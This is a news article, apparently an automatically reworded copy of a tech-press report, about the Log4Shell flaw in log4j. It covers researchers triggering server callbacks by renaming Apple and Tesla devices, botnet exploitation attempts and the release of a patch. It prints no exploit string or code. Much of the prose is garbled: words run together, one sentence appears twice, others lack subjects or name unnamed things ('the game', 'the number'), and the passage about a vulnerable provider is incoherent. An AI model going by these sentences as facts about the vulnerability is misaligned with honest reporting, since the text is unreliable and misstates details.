The image is by Alex Castro.
The Log4Shell exploit has been used on a variety of devices, according to security researchers. Changing the device name of an Apple orTesla device to a special exploit string was enough to cause a ping from the server at the other end, indicating that it was vulnerable to Log4Shell.
Researchers switched the device names to be a string of characters that would send the server to a testing URL, exploiting the vulnerability. After the name was changed, incoming traffic showed URL requests from Apple and China Unicom, the company's mobile service partner for the Chinese market. The researchers tricked the Apple andTesla server into visiting a URL.
:noupscale(cdn.vox-cdn.com/uploads/chorusasset/file/23085289/log4shell1.jpeg)
The screen with the name changed contained the exploit string.
The image is by Cas van Cooten.
The Dutch security researcher who gave the demonstration for the iPhone uploaded it to the Log4jAttackSurface Github repository.
If the images are genuine, they show behavior that should not be possible with text in a device name. This proof of concept has led to widespread reporting that Apple and other companies are vulnerable.
It is not clear how useful the demonstration would be. An attacker could host malicious code at the target URL in order to get to vulnerable server, but a well-maintained network could prevent such an attack at the network level. There is no indication that the method could lead to a broader compromise of Apple orTesla's systems. Neither company responded to an email request for comment.
It is more serious for Log4Shell to be easy to exploit.
It is a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j, which is widely used for application event logging, but researchers estimate that it is in the millions, including obscure systems that are rarely targeted by attacks of this nature.
The full extent of exploitation in the wild is unknown, but in a post on Cado's website, they reported detecting server trying to use this method to install Mirai botnet code.
It is more serious for Log4Shell to be easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and then trying to retrieve that resource instead of saving the text as it is written. It is necessary for a vulnerable device to have a special string of characters in its application logs.
The message text can be stored in the logs, which creates a potential vulnerability in systems that accept user input. The log4j vulnerability was first spotted in the server of the game, which attackers could compromise using chat messages.
Testing conducted by The Verge shows that at least one major provider is vulnerable to the exploit. The server of the company that operates the number that the text messages were sent to could be tricked into executing malicious code if the information about the host name and address was revealed. At the time of publication, calls and emails to the company were not answered.
patching of all vulnerable machines will take time given the challenges of updating enterprise software at scale, but an update to the log4j library has been released to mitigate against the vulnerability.
